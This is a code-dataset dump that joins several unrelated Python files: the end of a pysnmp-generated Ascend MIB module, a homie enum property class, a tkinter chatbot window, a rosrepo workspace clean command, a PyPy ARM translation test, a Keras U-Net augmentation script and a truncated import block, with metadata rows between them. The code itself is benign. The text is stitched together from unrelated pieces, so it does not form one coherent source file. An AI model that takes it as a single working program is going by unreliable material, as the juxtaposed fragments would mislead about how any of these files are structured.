systemProfile_UseTrunkGroups = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-UseTrunkGroups").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_UseTrunkGroups.setStatus('mandatory')
systemProfile_NumDigitsTrunkGroups = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 15), Integer32()).setLabel("systemProfile-NumDigitsTrunkGroups").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NumDigitsTrunkGroups.setStatus('mandatory')
systemProfile_AutoLogout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-AutoLogout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_AutoLogout.setStatus('mandatory')
systemProfile_IdleLogout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 17), Integer32()).setLabel("systemProfile-IdleLogout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IdleLogout.setStatus('mandatory')
systemProfile_P50SwitchUsage = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("switchUnused", 1), ("switchSerialWan", 2), ("switchNumberOfUses", 3)))).setLabel("systemProfile-P50SwitchUsage").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_P50SwitchUsage.setStatus('mandatory')
systemProfile_oDS0MinRst = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("daily", 2), ("monthly", 3)))).setLabel("systemProfile-oDS0MinRst").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_oDS0MinRst.setStatus('mandatory')
systemProfile_MaxSystemDS0Mins = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 20), Integer32()).setLabel("systemProfile-MaxSystemDS0Mins").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MaxSystemDS0Mins.setStatus('mandatory')
systemProfile_MaxDialoutTime = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 21), Integer32()).setLabel("systemProfile-MaxDialoutTime").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MaxDialoutTime.setStatus('mandatory')
systemProfile_ParallelDialing = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 22), Integer32()).setLabel("systemProfile-ParallelDialing").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ParallelDialing.setStatus('mandatory')
systemProfile_SingleFileIncoming = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 23), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SingleFileIncoming").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SingleFileIncoming.setStatus('mandatory')
systemProfile_DelayDualPortDialing = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 24), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-DelayDualPortDialing").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DelayDualPortDialing.setStatus('mandatory')
systemProfile_EditNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 25), DisplayString()).setLabel("systemProfile-EditNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_EditNumber.setStatus('mandatory')
systemProfile_AnalogEncoding = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 26), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("uLaw", 1), ("aLaw", 2)))).setLabel("systemProfile-AnalogEncoding").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_AnalogEncoding.setStatus('mandatory')
systemProfile_SessionidBase = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 27), Integer32()).setLabel("systemProfile-SessionidBase").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SessionidBase.setStatus('mandatory')
systemProfile_TOnline = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 28), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-TOnline").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TOnline.setStatus('mandatory')
systemProfile_TOnlineMostAvailChan = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 29), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-TOnlineMostAvailChan").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TOnlineMostAvailChan.setStatus('mandatory')
systemProfile_T302Timer = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 30), Integer32()).setLabel("systemProfile-T302Timer").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_T302Timer.setStatus('mandatory')
systemProfile_CallRoutingSortMethod = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 31), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("itemFirst", 1), ("slotFirst", 2)))).setLabel("systemProfile-CallRoutingSortMethod").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_CallRoutingSortMethod.setStatus('mandatory')
systemProfile_DigitalCallRoutingSortMethod = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("itemFirst", 1), ("slotFirst", 2)))).setLabel("systemProfile-DigitalCallRoutingSortMethod").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DigitalCallRoutingSortMethod.setStatus('mandatory')
systemProfile_ExactMatchCallRouting = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-ExactMatchCallRouting").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ExactMatchCallRouting.setStatus('mandatory')
systemProfile_ShelfControllerType = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 34), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("master", 2), ("slave", 3)))).setLabel("systemProfile-ShelfControllerType").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ShelfControllerType.setStatus('mandatory')
systemProfile_MasterShelfController = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 35), Integer32()).setLabel("systemProfile-MasterShelfController").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MasterShelfController.setStatus('mandatory')
systemProfile_NewNasPortIdFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 36), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-NewNasPortIdFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NewNasPortIdFormat.setStatus('mandatory')
systemProfile_NasPortFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 59), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("notApplicable", 1), ("n-2455", 2), ("n-655", 3), ("n-122", 4), ("n-1233", 5)))).setLabel("systemProfile-NasPortFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NasPortFormat.setStatus('mandatory')
systemProfile_ModemPriTypeOfNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 37), Integer32()).setLabel("systemProfile-ModemPriTypeOfNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ModemPriTypeOfNumber.setStatus('mandatory')
systemProfile_ModemPriNumberingPlanId = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 38), Integer32()).setLabel("systemProfile-ModemPriNumberingPlanId").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ModemPriNumberingPlanId.setStatus('mandatory')
systemProfile_WanInterface = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 39), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("wanT1", 1), ("wanSwan", 2)))).setLabel("systemProfile-WanInterface").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_WanInterface.setStatus('mandatory')
systemProfile_PermConnUpdMode = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 40), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("all", 1), ("changed", 2)))).setLabel("systemProfile-PermConnUpdMode").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_PermConnUpdMode.setStatus('mandatory')
systemProfile_UserstatFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 41), DisplayString()).setLabel("systemProfile-UserstatFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_UserstatFormat.setStatus('mandatory')
systemProfile_ControlBusType = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 42), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dpram", 1), ("pbus", 2)))).setLabel("systemProfile-ControlBusType").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ControlBusType.setStatus('mandatory')
systemProfile_BootSrVersion = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 43), DisplayString()).setLabel("systemProfile-BootSrVersion").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_BootSrVersion.setStatus('mandatory')
systemProfile_SysModemProfile_oATAnswerString = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 44), DisplayString()).setLabel("systemProfile-SysModemProfile-oATAnswerString").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SysModemProfile_oATAnswerString.setStatus('mandatory')
systemProfile_CallByCall = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 45), Integer32()).setLabel("systemProfile-CallByCall").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_CallByCall.setStatus('mandatory')
systemProfile_Country = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 46), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 23, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22))).clone(namedValues=NamedValues(("argentina", 2), ("australia", 3), ("belgium", 4), ("brazil", 23), ("china", 5), ("costaRica", 6), ("finland", 7), ("france", 8), ("germany", 9), ("hongKong", 10), ("italy", 11), ("japan", 12), ("korea", 13), ("mexico", 14), ("netherlands", 15), ("newZealand", 16), ("singapore", 17), ("spain", 18), ("sweden", 19), ("switzerland", 20), ("uk", 21), ("us", 22)))).setLabel("systemProfile-Country").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Country.setStatus('mandatory')
systemProfile_PotsDigitTimeout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 47), Integer32()).setLabel("systemProfile-PotsDigitTimeout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_PotsDigitTimeout.setStatus('mandatory')
systemProfile_System8kClock = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5))).clone(namedValues=NamedValues(("controller", 2), ("limOrTrunkModule", 3), ("bits", 4), ("ami8k", 5)))).setLabel("systemProfile-System8kClock").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_System8kClock.setStatus('mandatory')
systemProfile_SupportDbcs = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 49), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SupportDbcs").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SupportDbcs.setStatus('mandatory')
systemProfile_IncCallDistrib = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 50), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("firstAvailable", 2), ("fairShare", 3)))).setLabel("systemProfile-IncCallDistrib").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IncCallDistrib.setStatus('mandatory')
systemProfile_IgnoreLineup = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 51), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-IgnoreLineup").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IgnoreLineup.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile1 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 53), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile1").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile1.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile2 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 54), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile2").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile2.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile3 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 55), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile3").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile3.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile4 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 56), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile4").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile4.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile5 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 57), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile5").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile5.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile6 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 58), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile6").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile6.setStatus('mandatory')
systemProfile_Action_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 52), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noAction", 1), ("createProfile", 2), ("deleteProfile", 3)))).setLabel("systemProfile-Action-o").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Action_o.setStatus('mandatory')
mibsystemProfile_StatusNumberTable = MibTable((1, 3, 6, 1, 4, 1, 529, 23, 125, 2), ).setLabel("mibsystemProfile-StatusNumberTable")
if mibBuilder.loadTexts: mibsystemProfile_StatusNumberTable.setStatus('mandatory')
mibsystemProfile_StatusNumberEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1), ).setLabel("mibsystemProfile-StatusNumberEntry").setIndexNames((0, "ASCEND-MIBSYS1-MIB", "systemProfile-StatusNumber-Index-o"), (0, "ASCEND-MIBSYS1-MIB", "systemProfile-StatusNumber-Index1-o"))
if mibBuilder.loadTexts: mibsystemProfile_StatusNumberEntry.setStatus('mandatory')
systemProfile_StatusNumber_Index_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 1), Integer32()).setLabel("systemProfile-StatusNumber-Index-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_StatusNumber_Index_o.setStatus('mandatory')
systemProfile_StatusNumber_Index1_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 2), Integer32()).setLabel("systemProfile-StatusNumber-Index1-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_StatusNumber_Index1_o.setStatus('mandatory')
systemProfile_StatusNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 3), DisplayString()).setLabel("systemProfile-StatusNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_StatusNumber.setStatus('mandatory')
mibBuilder.exportSymbols("ASCEND-MIBSYS1-MIB", systemProfile_CallRoutingSortMethod=systemProfile_CallRoutingSortMethod, systemProfile_MasterShelfController=systemProfile_MasterShelfController, systemProfile_PotsDigitTimeout=systemProfile_PotsDigitTimeout, systemProfile_JamFileComponents_JamFile6=systemProfile_JamFileComponents_JamFile6, systemProfile_Index_o=systemProfile_Index_o, systemProfile_MaxDialoutTime=systemProfile_MaxDialoutTime, mibsystemProfileEntry=mibsystemProfileEntry, systemProfile_SessionidBase=systemProfile_SessionidBase, systemProfile_ExactMatchCallRouting=systemProfile_ExactMatchCallRouting, systemProfile_CallByCall=systemProfile_CallByCall, systemProfile_AutoLogout=systemProfile_AutoLogout, DisplayString=DisplayString, systemProfile_UserstatFormat=systemProfile_UserstatFormat, systemProfile_IdleLogout=systemProfile_IdleLogout, systemProfile_EditNumber=systemProfile_EditNumber, systemProfile_P50SwitchUsage=systemProfile_P50SwitchUsage, systemProfile_DigitalCallRoutingSortMethod=systemProfile_DigitalCallRoutingSortMethod, systemProfile_JamFileComponents_JamFile1=systemProfile_JamFileComponents_JamFile1, systemProfile_IncCallDistrib=systemProfile_IncCallDistrib, mibsystemProfile_StatusNumberTable=mibsystemProfile_StatusNumberTable, systemProfile_ParallelDialing=systemProfile_ParallelDialing, systemProfile_SystemRmtMgmt=systemProfile_SystemRmtMgmt, systemProfile_AnalogEncoding=systemProfile_AnalogEncoding, systemProfile_ControlBusType=systemProfile_ControlBusType, systemProfile_Name=systemProfile_Name, systemProfile_IgnoreLineup=systemProfile_IgnoreLineup, systemProfile_JamFileComponents_JamFile2=systemProfile_JamFileComponents_JamFile2, systemProfile_Console=systemProfile_Console, systemProfile_SubAddressMode=systemProfile_SubAddressMode, systemProfile_NumDigitsTrunkGroups=systemProfile_NumDigitsTrunkGroups, systemProfile_Contact=systemProfile_Contact, systemProfile_ModemPriNumberingPlanId=systemProfile_ModemPriNumberingPlanId, systemProfile_BootSrVersion=systemProfile_BootSrVersion, systemProfile_DmSubaddress=systemProfile_DmSubaddress, systemProfile_V110Subaddress=systemProfile_V110Subaddress, mibsystemProfileTable=mibsystemProfileTable, systemProfile_Location=systemProfile_Location, systemProfile_oDS0MinRst=systemProfile_oDS0MinRst, systemProfile_JamFileComponents_JamFile3=systemProfile_JamFileComponents_JamFile3, systemProfile_StatusNumber=systemProfile_StatusNumber, systemProfile_UseTrunkGroups=systemProfile_UseTrunkGroups, systemProfile_TermRate=systemProfile_TermRate, mibsystemProfile=mibsystemProfile, mibsystemProfile_StatusNumberEntry=mibsystemProfile_StatusNumberEntry, systemProfile_ShelfControllerType=systemProfile_ShelfControllerType, systemProfile_WanInterface=systemProfile_WanInterface, systemProfile_PermConnUpdMode=systemProfile_PermConnUpdMode, systemProfile_NasPortFormat=systemProfile_NasPortFormat, systemProfile_ModemPriTypeOfNumber=systemProfile_ModemPriTypeOfNumber, systemProfile_SupportDbcs=systemProfile_SupportDbcs, systemProfile_DelayDualPortDialing=systemProfile_DelayDualPortDialing, systemProfile_TOnline=systemProfile_TOnline, systemProfile_SerialSubaddress=systemProfile_SerialSubaddress, systemProfile_JamFileComponents_JamFile5=systemProfile_JamFileComponents_JamFile5, systemProfile_T302Timer=systemProfile_T302Timer, systemProfile_LanSubaddress=systemProfile_LanSubaddress, systemProfile_SingleFileIncoming=systemProfile_SingleFileIncoming, systemProfile_NewNasPortIdFormat=systemProfile_NewNasPortIdFormat, systemProfile_Country=systemProfile_Country, systemProfile_SysModemProfile_oATAnswerString=systemProfile_SysModemProfile_oATAnswerString, systemProfile_System8kClock=systemProfile_System8kClock, systemProfile_Action_o=systemProfile_Action_o, systemProfile_MaxSystemDS0Mins=systemProfile_MaxSystemDS0Mins, systemProfile_JamFileComponents_JamFile4=systemProfile_JamFileComponents_JamFile4, systemProfile_ConsoleSecurity=systemProfile_ConsoleSecurity, systemProfile_TOnlineMostAvailChan=systemProfile_TOnlineMostAvailChan, systemProfile_StatusNumber_Index_o=systemProfile_StatusNumber_Index_o, systemProfile_StatusNumber_Index1_o=systemProfile_StatusNumber_Index1_o)
| 175.532895 | 4,174 | 0.793973 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp/ASCEND-MIBSYS1-MIB.py | 26,681 | Python |
import logging
from .property_base import Property_Base
logger = logging.getLogger(__name__)
class Property_Enum(Property_Base):
def __init__(self, node, id, name, settable=True, retained=True, qos=1, unit=None, data_type='enum', data_format=None, value=None, set_value=None):
assert(data_format)
super().__init__(node,id,name,settable,retained,qos,unit,data_type,data_format,value,set_value)
self.enum_list = data_format.split(',')
def validate_value(self, value):
return value in self.enum_list
| 31.941176 | 151 | 0.734807 | [
"MIT"
] | dresber/HomieV3 | homie/node/property/property_enum.py | 543 | Python |
import tkinter as tk
import pygubu
import datetime
from Bot import ChatBot as bot
class Application:
def __init__(self, master):
self.master = master
self.builder = builder = pygubu.Builder()
builder.add_from_file('chat_window.ui')
self.mainWindow = builder.get_object('mainwindow', master)
self.etMessage = builder.get_object('etMessage', master)
self.etMessage.grid(sticky='nsew')
self.textArea = builder.get_object('taDisplay', master)
self.textArea.config(font=("consolas", 12), undo=True, wrap='word')
self.master.bind("<Return>", self.showContents)
self.scrollBar = builder.get_object('sbDisplay', master)
self.scrollBar.grid(sticky='nsew')
self.textArea['yscrollcommand'] = self.scrollBar.set
self.chatBot = bot.ChatBot.getBot()
builder.connect_callbacks(self)
def sendMessage(self):
message = self.etMessage.get()
date = "[" + datetime.datetime.now().strftime("%H:%M:%S") + "] "
self.textArea.insert(tk.END, date + message + "\n")
self.textArea.insert(tk.END, date + self.chatBot.response(message) + "\n\n")
self.textArea.see(tk.END)
self.etMessage.delete(0, tk.END)
def onSend(self):
self.sendMessage()
def showContents(self, event):
self.sendMessage()
if __name__ == '__main__':
root = tk.Tk()
app = Application(root)
root.mainloop()
| 30.4375 | 84 | 0.639288 | [
"Apache-2.0"
] | AhmetYkayhan/BBC | Server/ChatBot/UI/ChatView.py | 1,461 | Python |
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
from .workspace import get_workspace_location, get_workspace_state, resolve_this, find_ros_root
from .config import Config
from .cache import Cache
from .ui import msg, warning, fatal, show_conflicts
from .util import call_process, PIPE
from .resolver import find_dependees
import os
try:
from os import scandir
except ImportError:
from scandir import scandir
def run(args):
wsdir = get_workspace_location(args.workspace)
config = Config(wsdir)
cache = Cache(wsdir)
ros_rootdir = find_ros_root(config.get("ros_root", None))
if ros_rootdir is None:
fatal("cannot detect ROS distribution. Have you sourced your setup.bash?\n")
if args.this:
if args.offline is None:
args.offline = config.get("offline_mode", False)
if args.offline:
warning("offline mode. Run 'rosrepo config --online' to disable\n")
ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
args.packages = resolve_this(wsdir, ws_state)
elif args.vanished or args.unused:
if args.offline is None:
args.offline = config.get("offline_mode", False)
if args.offline:
warning("offline mode. Run 'rosrepo config --online' to disable\n")
ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
args.packages = []
for d in scandir(os.path.join(wsdir, "build")):
if d.is_dir() and d.name not in ws_state.ws_packages and not d.name == "catkin_tools_prebuild":
args.packages.append(d.name)
if args.unused:
depends, _, conflicts = find_dependees(config["pinned_build"] + config["default_build"], ws_state, ignore_missing=True)
show_conflicts(conflicts)
if conflicts:
fatal("cannot resolve dependencies\n")
unused_packages = set(ws_state.ws_packages) - set(depends.keys())
args.packages += [p for p in unused_packages if os.path.isdir(os.path.join(wsdir, "build", p))]
if not args.packages:
msg("Nothing to clean\n")
return 0
if not args.dry_run:
invoke = ["catkin", "config", "--extend", ros_rootdir]
call_process(invoke, stdout=PIPE, stderr=PIPE)
config["last_ros_root"] = ros_rootdir
config.write()
catkin_clean = ["catkin", "clean", "--workspace", wsdir, "--yes"]
if args.dry_run:
catkin_clean.append("--dry-run")
catkin_clean += args.packages or ["--all"]
return call_process(catkin_clean)
| 39.481928 | 131 | 0.676533 | [
"Apache-2.0"
] | fkie/rosrepo | src/rosrepo/cmd_clean.py | 3,278 | Python |
from socket import *
from datetime import datetime
import json
#rew
def send(temperature, humidity, socket):
dict = {'timestamp':datetime.now().strftime("%X"), 'temperature':temperature, 'humidity':humidity}
message = json.dumps(dict)
try :
socket.send(message)
except :
socket.close()
s = socket(AF_INET, SOCK_STREAM)
PORT = 40017
s.connect(('', PORT))
while(1):
temperature = raw_input('Temperature: ')
humidity = raw_input('Humidity: ')
send(temperature, humidity, s)
s.close()
| 21.076923 | 103 | 0.644161 | [
"MIT"
] | simenvg/projetBeehive | client.py | 548 | Python |
from rpython.jit.backend.llsupport.test.ztranslation_test import TranslationRemoveTypePtrTest
from rpython.translator.translator import TranslationContext
from rpython.config.translationoption import DEFL_GC
from rpython.jit.backend.arm.test.support import skip_unless_run_slow_tests
skip_unless_run_slow_tests()
class TestTranslationRemoveTypePtrARM(TranslationRemoveTypePtrTest):
def _get_TranslationContext(self):
t = TranslationContext()
t.config.translation.gc = DEFL_GC # 'hybrid' or 'minimark'
t.config.translation.gcrootfinder = 'shadowstack'
t.config.translation.list_comprehension_operations = True
t.config.translation.gcremovetypeptr = True
return t | 47.8 | 93 | 0.797768 | [
"MIT"
] | bxtkezhan/rpython | rpython/jit/backend/arm/test/test_ztranslation_external_exception.py | 717 | Python |
from data import *
# data augmentation
#In deep learning tasks, a lot of data is need to train DNN model, when the dataset is not big enough, data augmentation should be applied.
#keras.preprocessing.image.ImageDataGenerator is a data generator, which can feed the DNN with data like : (data,label), it can also do data augmentation at the same time.
#It is very convenient for us to use keras.preprocessing.image.ImageDataGenerator to do data augmentation by implement image rotation, shift, rescale and so on... see [keras documentation](https://keras.io/preprocessing/image/) for detail.
#For image segmentation tasks, the image and mask must be transformed **together!!**
## define your data generator
# If you want to visualize your data augmentation result, set save_to_dir = your path
#if you don't want to do data augmentation, set data_gen_args as an empty dict.
#data_gen_args = dict()
data_gen_args = dict(rotation_range=0.2,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.05,
zoom_range=0.05,
horizontal_flip=True,
fill_mode='nearest')
myGenerator = trainGenerator(20, '/data/s2732815/unet/data/train', 'image', 'label',
data_gen_args, save_to_dir = '/data/s2732815/unet/data/train/aug')
## visualize your data augmentation result
#you will see 60 transformed images and their masks in data/membrane/train/aug
num_batch = 3
for i,batch in enumerate(myGenerator):
if(i >= num_batch):
break
## create .npy data
# If your computer has enough memory, you can create npy files containing all your images and masks, and feed your DNN with them.
# image_arr, mask_arr = geneTrainNpy("data/membrane/train/aug/", "data/membrane/train/aug/")
# np.save("data/image_arr.npy",image_arr)
# np.save("data/mask_arr.npy",mask_arr)
| 42.6 | 239 | 0.70579 | [
"MIT"
] | asterberova/unet | dataPrepare.py | 1,917 | Python |
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
